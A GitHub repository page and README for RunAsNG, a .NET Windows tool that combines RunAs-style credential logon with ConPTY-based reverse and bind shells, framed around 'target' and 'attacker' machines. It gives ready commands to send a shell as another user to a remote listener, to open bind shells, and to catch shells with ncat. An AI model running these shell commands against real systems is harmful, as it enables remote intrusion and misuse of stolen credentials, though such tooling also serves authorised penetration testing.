Skip to content
PeanTasterPublic

About

Implementation of runas on dotnet and powershell with small features

Resources

Stars

0 stars

Watchers

0 watching

Forks

Latest commit

 

History

6 Commits

Folders and files

Repository files navigation

RunASNewGen (RunAsNG)

A fully interactive Windows shell tool with built-in RunAs and network capabilities. Combines credential-based process execution (CreateProcessWithLogonW) with Windows ConPTY for true terminal emulation over TCP — no external tools required.

Why RunASNewGen?

The built-in Windows runas command has significant limitations:

Feature Windows runas RunAsNG
Interactive shell in current console No (opens new window) Yes
Works over reverse/bind shell No Yes (ConPTY)
Built-in TCP reverse shell No Yes
Built-in TCP bind shell No Yes
Built-in interactive client No Yes (raw terminal)
Tab completion over network No Yes
Arrow keys / history over network No Yes
VT100/ANSI escape support No Yes
NETONLY logon CLI only Yes (-n)
Works with ncat/netcat N/A Yes (--no-pty)
Single binary, no dependencies N/A Yes (.NET 9 required on target)

Architecture

┌─────────────────────────────────────────────────────────────┐
│ Target Machine (sends shell)                                │
│                                                             │
│  RunAsNG.exe (parent)                                        │
│    │                                                        │
│    ├── Console mode: attaches helper to parent's console    │
│    │                                                        │
│    ├── Pipe mode: named pipes + ConPTY (when stdin is pipe) │
│    │                                                        │
│    └── Network mode: TCP ↔ ConPTY (or TCP ↔ pipes)         │
│         │                                                   │
│         ├── Direct: socket ↔ ConPTY ↔ cmd.exe              │
│         │                                                   │
│         ├── RunAs: socket ↔ named pipes ↔ helper process   │
│         │          (helper runs as target user with ConPTY) │
│         │                                                   │
│         └── --no-pty: socket ↔ stdin/stdout pipes ↔ cmd    │
│                                                             │
└─────────────────────────────────────────────────────────────┘
         │ TCP
         ▼
┌─────────────────────────────────────────────────────────────┐
│ Attacker Machine (receives shell)                           │
│                                                             │
│  Option A: RunAsNG.exe -C listen:4444  (full interactivity)  │
│  Option B: ncat -lvnp 4444           (basic, --no-pty)     │
│  Option C: stty raw -echo; ncat ...  (Linux, full ConPTY)  │
│                                                             │
└─────────────────────────────────────────────────────────────┘

Helper Process

When RunAs is used (-u/-p), the parent cannot directly attach ConPTY to a process running as another user. Instead:

  1. Parent copies itself to C:\ProgramData\RunAsNG\ with permissive ACLs
  2. Parent creates named pipes with NULL DACL (accessible by any user)
  3. Parent launches the copy as the target user via CreateProcessWithLogonW
  4. The helper (running as target user) connects to the named pipes, creates a ConPTY, and spawns the shell
  5. Data flows: TCP/console ↔ parent ↔ named pipes ↔ helper ↔ ConPTY ↔ shell

Options Reference

Option Long Description
-u --user Username. Supports DOMAIN\user, user@domain, or just user
-p --pass Password for the target user
-d --domain Domain (default: . for local machine). Auto-detected from username
-c --cmd Command to execute (default: cmd.exe)
-n --netonly Use LOGON_NETCREDENTIALS_ONLY — local identity unchanged, network identity uses provided credentials
-r --reverse Reverse shell: connect back to host:port
-l --listen Bind shell: listen on port for incoming connection
-C --connect Interactive client with raw console mode (replaces ncat)
--no-pty Disable ConPTY, use basic pipe redirection. Compatible with ncat
--rows Terminal rows (default: 30). Used for ConPTY size
--cols Terminal columns (default: 120). Used for ConPTY size
-h --help Show help

-C (Client Mode) Details

The client mode puts the Windows console into raw mode (ENABLE_VIRTUAL_TERMINAL_INPUT, no line buffering, no echo) and negotiates terminal size with the server automatically.

Two forms:

  • -C host:port — connect to a bind shell
  • -C listen:port — listen for a reverse shell

--no-pty Details

Disables ConPTY entirely. The shell's stdin/stdout are connected directly via pipes to the TCP socket. Output is stable but non-interactive:

  • No tab completion
  • No arrow keys / command history
  • No Ctrl+C passthrough (use Ctrl+Break or close connection)
  • Compatible with any TCP client (ncat, netcat, socat)

--netonly Details

Uses LOGON_NETCREDENTIALS_ONLY flag. The spawned process runs with the current user's local identity but uses the specified credentials for network authentication. Useful for accessing network resources (SMB shares, RPC, etc.) with different domain credentials without actually logging in as that user.

Usage Scenarios

1. Local RunAs — Interactive Shell as Another User

Run a shell as user in the current console window (no new window spawns):

RunAsNG.exe -u user -p P@ssw0rd

With PowerShell:

RunAsNG.exe -u DOMAIN\admin -p Secret123 -c powershell.exe

2. Reverse Shell — Full Interactivity (Windows → Windows)

Receiver (your machine, Windows):

RunAsNG.exe -C listen:4444

Sender (target machine):

RunAsNG.exe -r 10.0.0.1:4444

Tab completion, arrow keys, colors, Ctrl+C — everything works.

3. Reverse Shell — Full Interactivity (Windows → Linux)

Receiver (your machine, Linux):

# Check terminal size
stty size
# Output: 50 200

# Listen with raw terminal
stty raw -echo; ncat -lvnp 4444; stty sane

Sender (target machine, match terminal size):

RunAsNG.exe -r 172.17.71.92:4444 --rows 50 --cols 200

Important: Do not resize the terminal window during the session. ConPTY cannot detect size changes dynamically.

4. Reverse Shell + RunAs

Send a shell running as a different user:

Receiver:

RunAsNG.exe -C listen:4444

Sender:

RunAsNG.exe -r 10.0.0.1:4444 -u Administrator -p P@ssw0rd

5. Reverse Shell — ncat Compatible (--no-pty)

When you only have ncat on the receiving side and don't need full interactivity:

Receiver (Windows):

chcp 65001 && ncat -lvnp 4444

Receiver (Linux):

ncat -lvnp 4444

Sender:

RunAsNG.exe -r 10.0.0.1:4444 --no-pty

6. Bind Shell

Target listens, you connect:

Target:

RunAsNG.exe -l 4444

Your machine:

RunAsNG.exe -C 10.0.0.2:4444

7. Bind Shell + RunAs

Target:

RunAsNG.exe -l 4444 -u admin -p Secret -c powershell.exe

Your machine:

RunAsNG.exe -C 10.0.0.2:4444

8. NETONLY — Access Network Resources with Different Credentials

Spawn a shell that uses domain credentials for network access but keeps local identity:

RunAsNG.exe -u CORP\admin -p DomainPass -n -c powershell.exe

Inside the shell, whoami shows your original user, but dir \\fileserver\share authenticates as CORP\admin.

Corner Cases & Troubleshooting

Terminal size mismatch (text wrapping / cursor jumping)

ConPTY uses a fixed terminal size set at creation time. If the receiver's terminal is a different size, cursor positioning will be wrong.

Fix: Use -C client (auto-negotiates size) or pass --rows/--cols matching your terminal. On Linux, run stty size to get the values.

UTF-8 / Cyrillic display issues

Receiver Mode Fix
RunAsNG -C ConPTY Works automatically (client sets UTF-8 codepage)
ncat (Windows) --no-pty Run chcp 65001 before starting ncat
ncat (Linux) ConPTY Works automatically (Linux terminals are UTF-8 by default)
ncat (Windows) ConPTY Not recommended — use -C client instead

RunAs helper fails with exit code 0xE0434352

This is a .NET CLR exception during helper startup. Common causes:

  • Target user has no profile and .NET can't find a temp directory
  • .NET 9 runtime is not installed globally

Fix: Ensure .NET 9 runtime is installed in C:\Program Files\dotnet\ (accessible to all users). Create the target user's profile by logging in as that user at least once.

ncat + ConPTY (without --no-pty) has garbled output

ncat on Windows doesn't process VT100 escape sequences properly and doesn't report terminal size. Use either:

  • RunAsNG -C on Windows (recommended)
  • stty raw -echo; ncat ... on Linux
  • --no-pty flag for ncat on Windows

Reverse shell connection retry

When using -r, the tool retries the connection up to 10 times with increasing backoff (1s, 2s, ... up to 5s). Start the listener before the sender, or the sender will keep retrying for ~30 seconds.

Bind shell firewall

When using -l, ensure the listening port is allowed through Windows Firewall. Windows may prompt to allow the connection on first use.

Helper deployment path

The helper binary is deployed to C:\ProgramData\RunAsNG\ with permissive ACLs (Everyone: RX). If this directory has stale files from a previous version, delete it manually and re-run.

Building

Requirements: .NET 9 SDK

Debug build:

dotnet build

Release publish (framework-dependent):

dotnet publish -c Release -o out

Output: out\RunAsNG.exe (~150KB) + runtime files. Requires .NET 9 runtime on target.

About

Implementation of runas on dotnet and powershell with small features

Resources

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Used by

Contributors

Languages